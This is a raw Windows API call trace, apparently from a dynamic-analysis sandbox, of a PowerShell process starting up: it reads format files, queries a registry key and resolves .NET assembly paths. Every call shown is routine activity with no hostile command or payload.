	[0409.591] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0409.592] GetFileType (hFile=0x2fc) returned 0x1
	[0409.592] SetErrorMode (uMode=0x1) returned 0x1
	[0409.592] GetFileType (hFile=0x2fc) returned 0x1
	[0409.592] ReadFile (in: hFile=0x2fc, lpBuffer=0x338c258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x338c258*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.594] ReadFile (in: hFile=0x2fc, lpBuffer=0x338c258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x338c258*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.595] ReadFile (in: hFile=0x2fc, lpBuffer=0x338c258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x338c258*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.595] ReadFile (in: hFile=0x2fc, lpBuffer=0x338c258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x338c258*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.595] ReadFile (in: hFile=0x2fc, lpBuffer=0x338c258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x338c258*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.596] ReadFile (in: hFile=0x2fc, lpBuffer=0x338c258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x338c258*, lpNumberOfBytesRead=0xccf98*=0xfb2, lpOverlapped=0x0) returned 1
	[0409.596] ReadFile (in: hFile=0x2fc, lpBuffer=0x338b972, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x338b972*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0409.596] ReadFile (in: hFile=0x2fc, lpBuffer=0x338c258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x338c258*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0409.596] CloseHandle (hObject=0x2fc) returned 1
	[0409.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.596] SetErrorMode (uMode=0x1) returned 0x1
	[0409.596] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0409.596] SetErrorMode (uMode=0x1) returned 0x1
	[0409.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0410.018] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd028 | out: phkResult=0xcd028*=0x2fc) returned 0x0
	[0410.018] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x56) returned 0x0
	[0410.018] CoTaskMemAlloc (cb=0x5a) returned 0x1b7726e0
	[0410.018] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf7c, lpData=0x1b7726e0, lpcbData=0xccf78*=0x56 | out: lpType=0xccf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf78*=0x56) returned 0x0
	[0410.018] CoTaskMemFree (pv=0x1b7726e0) 
	[0410.018] RegCloseKey (hKey=0x2fc) returned 0x0
	[0410.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0410.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0410.020] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x4ae368b9, Data2=0x9193, Data3=0x4a32, Data4=([0]=0xba, [1]=0xbd, [2]=0xca, [3]=0x23, [4]=0xbf, [5]=0x82, [6]=0x19, [7]=0xba))) returned 0x0
	[0410.025] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x98e347c7, Data2=0xf864, Data3=0x4c66, Data4=([0]=0x85, [1]=0x1d, [2]=0x53, [3]=0x63, [4]=0xb5, [5]=0x41, [6]=0xe6, [7]=0xb1))) returned 0x0
	[0410.026] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xef2ac4bb, Data2=0xab28, Data3=0x455a, Data4=([0]=0xb6, [1]=0x25, [2]=0xd3, [3]=0x98, [4]=0x99, [5]=0xab, [6]=0x4c, [7]=0xd7))) returned 0x0
	[0410.027] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x552b8974, Data2=0xa060, Data3=0x441a, Data4=([0]=0x9e, [1]=0x5e, [2]=0x2f, [3]=0x9f, [4]=0xc6, [5]=0x66, [6]=0xbe, [7]=0x58))) returned 0x0
	[0410.028] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xe2b6e594, Data2=0xdf80, Data3=0x4b01, Data4=([0]=0x88, [1]=0xf0, [2]=0x4f, [3]=0x38, [4]=0x3, [5]=0xc4, [6]=0x4e, [7]=0x5b))) returned 0x0
	[0410.028] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x55ddf870, Data2=0xec9, Data3=0x420f, Data4=([0]=0x9f, [1]=0x87, [2]=0xac, [3]=0xb3, [4]=0x8, [5]=0x1c, [6]=0xb4, [7]=0x19))) returned 0x0
	[0410.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0410.029] SetErrorMode (uMode=0x1) returned 0x1
	[0410.029] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0410.029] GetFileType (hFile=0x2fc) returned 0x1
	[0410.029] SetErrorMode (uMode=0x1) returned 0x1
	[0410.029] GetFileType (hFile=0x2fc) returned 0x1
	[0410.029] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d7fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33d7fb8*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0410.030] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d7fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33d7fb8*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0410.030] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d7fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33d7fb8*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0410.030] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d7fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33d7fb8*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0410.031] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d7fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33d7fb8*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0410.031] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d7fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33d7fb8*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0410.031] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d7fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33d7fb8*, lpNumberOfBytesRead=0xccf98*=0xaca, lpOverlapped=0x0) returned 1
	[0410.032] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d75ea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33d75ea*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0410.032] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d7fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33d7fb8*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0410.032] CloseHandle (hObject=0x2fc) returned 1
	[0410.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0410.032] SetErrorMode (uMode=0x1) returned 0x1
	[0410.032] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0410.032] SetErrorMode (uMode=0x1) returned 0x1
	[0410.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0410.032] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd028 | out: phkResult=0xcd028*=0x2fc) returned 0x0
	[0410.033] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x56) returned 0x0
	[0410.033] CoTaskMemAlloc (cb=0x5a) returned 0x1b7726e0
	[0410.033] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf7c, lpData=0x1b7726e0, lpcbData=0xccf78*=0x56 | out: lpType=0xccf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf78*=0x56) returned 0x0
	[0410.033] CoTaskMemFree (pv=0x1b7726e0) 
	[0410.033] RegCloseKey (hKey=0x2fc) returned 0x0
	[0410.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0410.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0410.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0410.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0410.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0410.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0410.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0410.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0410.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0410.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0410.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0410.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0410.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0410.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0410.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0410.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0410.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0410.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0410.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0410.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.788] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.789] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x1093573b, Data2=0xfad9, Data3=0x4268, Data4=([0]=0x8d, [1]=0xb5, [2]=0xd3, [3]=0xf8, [4]=0x63, [5]=0x80, [6]=0x71, [7]=0xaa))) returned 0x0
	[0410.790] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd487d569, Data2=0xeebd, Data3=0x4d5f, Data4=([0]=0x8b, [1]=0x55, [2]=0x88, [3]=0x4a, [4]=0xc6, [5]=0xcd, [6]=0xf6, [7]=0x2b))) returned 0x0
	[0410.791] VirtualQuery (in: lpAddress=0xcbc70, lpBuffer=0xccb30, dwLength=0x30 | out: lpBuffer=0xccb30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.792] VirtualQuery (in: lpAddress=0xcbc70, lpBuffer=0xccb30, dwLength=0x30 | out: lpBuffer=0xccb30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.793] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x1ac65940, Data2=0xdebb, Data3=0x45da, Data4=([0]=0xb2, [1]=0xb7, [2]=0xd0, [3]=0x76, [4]=0x24, [5]=0xc, [6]=0xfa, [7]=0xe3))) returned 0x0
	[0410.796] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x3d35415b, Data2=0xf894, Data3=0x4293, Data4=([0]=0xad, [1]=0x48, [2]=0x77, [3]=0xab, [4]=0x19, [5]=0x6e, [6]=0x6f, [7]=0xef))) returned 0x0
	[0410.796] VirtualQuery (in: lpAddress=0xcbec0, lpBuffer=0xccd80, dwLength=0x30 | out: lpBuffer=0xccd80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.797] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.797] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.798] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x4b83ef3e, Data2=0x400c, Data3=0x4f3c, Data4=([0]=0x8e, [1]=0xbe, [2]=0x1b, [3]=0x4a, [4]=0x82, [5]=0xfe, [6]=0x74, [7]=0xeb))) returned 0x0
	[0411.189] VirtualQuery (in: lpAddress=0xcbec0, lpBuffer=0xccd80, dwLength=0x30 | out: lpBuffer=0xccd80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.190] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
